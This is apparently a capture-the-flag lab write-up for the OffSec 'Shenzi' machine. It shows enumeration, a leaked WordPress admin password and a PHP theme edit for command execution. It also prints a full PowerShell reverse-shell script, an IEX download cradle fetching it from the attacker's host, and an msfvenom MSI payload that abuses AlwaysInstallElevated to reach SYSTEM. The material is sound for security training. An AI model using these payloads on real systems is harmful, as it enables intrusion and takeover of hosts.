Shenzi

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.203.55
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-14 01:23 EST
Nmap scan report for 192.168.203.55                                                                                                                                         
Host is up, received echo-reply ttl 125 (0.21s latency).                                                                                                                    
Scanned at 2025-11-14 01:24:00 EST for 202s                                           
Not shown: 65520 closed tcp ports (reset)                                                                                                                                   
PORT      STATE SERVICE       REASON          VERSION                                                                                                                       
21/tcp    open  ftp           syn-ack ttl 125 FileZilla ftpd 0.9.41 beta                                                                                                    
| ftp-syst:                                                                           
|_  SYST: UNIX emulated by FileZilla                                                                                                                                        
80/tcp    open  http          syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)                                                                        
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6                  
| http-title: Welcome to XAMPP                                                        
|_Requested resource was http://192.168.203.55/dashboard/                                                                                                                   
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820                                                                                                       
| http-methods:                                                                                                                                                             
|_  Supported Methods: GET HEAD POST OPTIONS                                          
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC                                                                                                         
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn                                                                                                 
443/tcp   open  ssl/http      syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)                                                                        
| http-title: Welcome to XAMPP                                                        
|_Requested resource was https://192.168.203.55/dashboard/                                                                                                                  
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6                  
| http-methods:                                                                                                                                                             
|_  Supported Methods: GET HEAD POST OPTIONS                                          
| tls-alpn:                                                                                                                                                                 
|_  http/1.1                                                                                                                                                                
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD                                                                                                       
| ssl-cert: Subject: commonName=localhost                                             
| Issuer: commonName=localhost                                                                                                                                              
| Public Key type: rsa                                                                                                                                                      
| Public Key bits: 1024                                                               
| Signature Algorithm: sha1WithRSAEncryption                                          
| Not valid before: 2009-11-10T23:48:47                                                                                                                                     
| Not valid after:  2019-11-08T23:48:47                                                                                                                                     
| MD5:   a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0                                                                                                                            
| SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6                            
| -----BEGIN CERTIFICATE-----                                                                                                                                               
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds? syn-ack ttl 125
3306/tcp  open  mysql         syn-ack ttl 125 MariaDB 10.3.24 or later (unauthorized)
5040/tcp  open  unknown       syn-ack ttl 125
7680/tcp  open  pando-pub?    syn-ack ttl 125
49664/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>

We have multiple open ports, we will play with them one by one.

FTP (21):

I could not authenticate as anonymous user.

SMB (445):

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]                                                                                                                     
└─$ nxc smb 192.168.203.55 -u '' -p ''                                                                                                                                      
SMB         192.168.203.55  445    SHENZI           [*] Windows 10 / Server 2019 Build 19041 x64 (name:SHENZI) (domain:shenzi) (signing:False) (SMBv1:False)                
SMB         192.168.203.55  445    SHENZI           [-] shenzi\: STATUS_ACCESS_DENIED

We do not have null session authentication, but:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]                                                                                                                     
└─$ nxc smb 192.168.203.55 -u 'guest' -p ''                                                                                                                                 
SMB         192.168.203.55  445    SHENZI           [*] Windows 10 / Server 2019 Build 19041 x64 (name:SHENZI) (domain:shenzi) (signing:False) (SMBv1:False)                
SMB         192.168.203.55  445    SHENZI           [+] shenzi\guest:

We do have guest authentication.

Enumerate the shares:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]                                                                                                                     
└─$ nxc smb 192.168.203.55 -u 'guest' -p '' --shares                                                                                                                        
SMB         192.168.203.55  445    SHENZI           [*] Windows 10 / Server 2019 Build 19041 x64 (name:SHENZI) (domain:shenzi) (signing:False) (SMBv1:False)                
SMB         192.168.203.55  445    SHENZI           [+] shenzi\guest:                                                                                                       
SMB         192.168.203.55  445    SHENZI           [*] Enumerated shares                                                                                                   
SMB         192.168.203.55  445    SHENZI           Share           Permissions     Remark                                                                                  
SMB         192.168.203.55  445    SHENZI           -----           -----------     ------                                                                                  
SMB         192.168.203.55  445    SHENZI           IPC$            READ            Remote IPC                                                                              
SMB         192.168.203.55  445    SHENZI           Shenzi          READ

We have read access to a non-default share named shenzi.

Via smbclient we can authenticate see what files are there, and download if any.

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ mkdir smb           

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ cd smb

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi/smb]
└─$ smbclient //192.168.203.55/Shenzi -U guest                                         
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu May 28 11:45:09 2020
  ..                                  D        0  Thu May 28 11:45:09 2020
  passwords.txt                       A      894  Thu May 28 11:45:09 2020
  readme_en.txt                       A     7367  Thu May 28 11:45:09 2020
  sess_klk75u2q4rpgfjs3785h6hpipp      A     3879  Thu May 28 11:45:09 2020
  why.tmp                             A      213  Thu May 28 11:45:09 2020
  xampp-control.ini                   A      178  Thu May 28 11:45:09 2020

                12941823 blocks of size 4096. 4831147 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \passwords.txt of size 894 as passwords.txt (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
getting file \readme_en.txt of size 7367 as readme_en.txt (7.8 KiloBytes/sec) (average 4.7 KiloBytes/sec)
getting file \sess_klk75u2q4rpgfjs3785h6hpipp of size 3879 as sess_klk75u2q4rpgfjs3785h6hpipp (4.0 KiloBytes/sec) (average 4.4 KiloBytes/sec)
getting file \why.tmp of size 213 as why.tmp (0.3 KiloBytes/sec) (average 3.4 KiloBytes/sec)
getting file \xampp-control.ini of size 178 as xampp-control.ini (0.2 KiloBytes/sec) (average 2.8 KiloBytes/sec)

Non of the files were interesting except for that one:

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Shenzi/smb]
└─$ cat passwords.txt
<snipped>

5) WordPress:

   User: admin
   Password: FeltHeadwallWight357

We have a set of credentials that seems to be for the admin on wordpress.

HTTP (80):

We were welcomed with the xampp default page.

I will run gobuster to discover hidden directories:

┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Shenzi/smb]
└─$ gobuster dir -u http://192.168.203.55/ -w /usr/share/wordlists/dirb/big.txt -x php -t 40
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.203.55/
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 1046]                                                                                                                            
/Index.php            (Status: 302) [Size: 0] [--> http://192.168.203.55/dashboard/]                                                                                        
/aux                  (Status: 403) [Size: 1046]                                                                                                                            
/aux.php              (Status: 403) [Size: 1046]                                                                                                                            
/cgi-bin/             (Status: 403) [Size: 1060]                                      
/com1.php             (Status: 403) [Size: 1046]                                                                                                                            
/com2                 (Status: 403) [Size: 1046]                                                                                                                            
/com2.php             (Status: 403) [Size: 1046]                                      
/com1                 (Status: 403) [Size: 1046]                                      
/com3.php             (Status: 403) [Size: 1046]                                      
/com3                 (Status: 403) [Size: 1046]                                                                                                                            
/com4                 (Status: 403) [Size: 1046]                                      
/com4.php             (Status: 403) [Size: 1046]                                      
/con                  (Status: 403) [Size: 1046]                                      
/con.php              (Status: 403) [Size: 1046]                                      
/dashboard            (Status: 301) [Size: 344] [--> http://192.168.203.55/dashboard/]
/examples             (Status: 503) [Size: 1060]
/favicon.ico          (Status: 200) [Size: 30894]
/img                  (Status: 301) [Size: 338] [--> http://192.168.203.55/img/]
/index.php            (Status: 302) [Size: 0] [--> http://192.168.203.55/dashboard/]
/licenses             (Status: 403) [Size: 1205]
<snipped>
/xampp                (Status: 301) [Size: 340] [--> http://192.168.203.55/xampp/]
Progress: 40938 / 40938 (100.00%)
===============================================================
Finished
===============================================================

I tried a couple of wordlists with no further results.

Then I went back to offsec portal, and unloacked one of the hints:

It says we should guess the root directory of wordpress website.

Sometimes offsec's uses the machine names in a lot of places like usernames, passwords, or even as a directory:

Here we have the wordpress website.

Go to /wp-admin it will redirect us to the login form:

Enter the username, and password we found earlier: admin:FeltHeadwallWight357.

We logged in successfully.

Exploitation:

From here we can get command execution since we are admins using two ways as I know: 1. uploading a plugin then use it to get command execution, or by adding a simple one line of php code in one of the themes files, then use it to get a reverse shell as well, I will use the latter, by going to Appearance -> Theme Editor -> Choose one of the PHP files (I chosed error.php, because if we triggered any error the code will be executed):

Scroll down, and click update file:

Now if we went to any non-existent page, we would see an error because of the system function:

Add the cmd paramter, and try any system command:

Nice we have command execution.

Now I will prepare a powershell web-cradle:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ cp /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 shell.ps1

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ vim shell.p

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ cat shell.ps1                                                         
$client = New-Object System.Net.Sockets.TCPClient('192.168.45.195',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Set-up a python3 web server, and a netcat listener:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...

Then download that file on the system memory and execute it via Invoke-Expression:

IEX(IWR -UseBasicParsing -Uri http://192.168.45.195/shell.ps1)

We will get a hit to our webserver:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.203.55 - - [14/Nov/2025 02:01:55] "GET /shell.ps1 HTTP/1.1" 200 -

And we have a reverse shell as shenzi:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.203.55] 50440

PS C:\xampp\htdocs\shenzi> whoami
shenzi\shenzi

Post-Exploitation:

I will upload winpeas to enumerate the system and try to find any attack vector for privilege escalation:

PS C:\Windows\Tasks> curl http://192.168.45.195/winPEASx86.exe -o winPEASx86.exe
PS C:\Windows\Tasks> dir


    Directory: C:\Windows\Tasks


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/13/2025  11:09 PM       10171904 winPEASx86.exe

Run it:

PS C:\Windows\Tasks> .\winPEASx86.exe                                                                                                                                       
 [!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search mi
ght take several minutes. For help, run winpeass.exe --help                                                                                                                 
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG
_DWORD /d 1' and then start a new CMD                                                                                                                                       
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it
 with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD                                         
                                                                                                                                                                            
               ((((((((((((((((((((((((((((((((                                                                                                                             
        (((((((((((((((((((((((((((((((((((((((((((                                                                                                                         
      ((((((((((((((**********/##########(((((((((((((                                                                                                                      
    ((((((((((((********************/#######(((((((((((                                                                                                                     
    ((((((((******************/@@@@@/****######((((((((((                                                                                                                   
    ((((((********************@@@@@@@@@@/***,####((((((((((                                                                                                                 
    (((((********************/@@@@@%@@@@/********##(((((((((
    (((############*********/%@@@@@@@@@/************((((((((
    ((##################(/******/@@@@@/***************((((((
    ((#########################(/**********************(((((
    ((##############################(/*****************(((((
    ((###################################(/************(((((
    ((#######################################(*********(((((
    ((#######(,.***.,(###################(..***.*******(((((
    ((#######*(#####((##################((######/(*****(((((
    ((###################(/***********(##############()(((((
    (((#####################/*******(################)((((((
    ((((############################################)((((((
    (((((##########################################)(((((((
    ((((((########################################)(((((((
    ((((((((####################################)((((((((
    (((((((((#################################)(((((((((
        ((((((((((##########################)(((((((((
              ((((((((((((((((((((((((((((((((((((((
                 ((((((((((((((((((((((((((((((

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the auth
or or of any other collaborator. Use it at your own devices and/or with the device owner's permission.

<snipped>

???????????? Checking AlwaysInstallElevated                                                                                                                                 
?  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated                                                    
    AlwaysInstallElevated set to 1 in HKLM!                                                                                                                                 
    AlwaysInstallElevated set to 1 in HKCU!

We have two important registries their values has been set to 1 which allow us to elevate our privileges.

You can refer to the hacktricks website for more information:

Windows Local Privilege Escalation - HackTricksbook.hacktricks.wiki

We can confirm the result of winpeas by quering the registries:

PS C:\Windows\Tasks> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated              
                                                                                                                                                                            
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer                                                                                                             
    AlwaysInstallElevated    REG_DWORD    0x1                                                                                                                               
                                                                                                                                                                            
PS C:\Windows\Tasks> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
                                                                                                                                                                            
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer                                                                                                            
    AlwaysInstallElevated    REG_DWORD    0x1

Now I will generate a .msi file, then upload it to the target:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.195 LPORT=443 -f msi -o runme.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of msi file: 159744 bytes
Saved as: runme.msi

PS C:\Windows\Tasks> curl http://192.168.45.195/runme.msi -o runme.msi
PS C:\Windows\Tasks> dir


    Directory: C:\Windows\Tasks


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/13/2025  11:40 PM         159744 runme.msi
-a----        11/13/2025  11:09 PM       10171904 winPEASx86.exe

Start another netcat listener:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...

Use msiexec to execute our installer, so we can get high privilege access:

PS C:\Windows\Tasks> msiexec /quiet /qn /i C:\Windows\Tasks\runme.msi

Going back to our netcat:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.203.55] 50920
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system

We are system.

Get the flags:

C:\WINDOWS\system32>type \Users\Administrator\Desktop\proof.txt
f526ab9a5ca67ea41c3dfd4892208d7d

C:\WINDOWS\system32>type \Users\shenzi\Desktop\local.txt
52eea052824fb47ad872425b98225970

PreviousNickel NextMonster

Last updated 2 months ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagFTP (21):

hashtagSMB (445):

hashtagHTTP (80):

hashtagExploitation:

hashtagPost-Exploitation: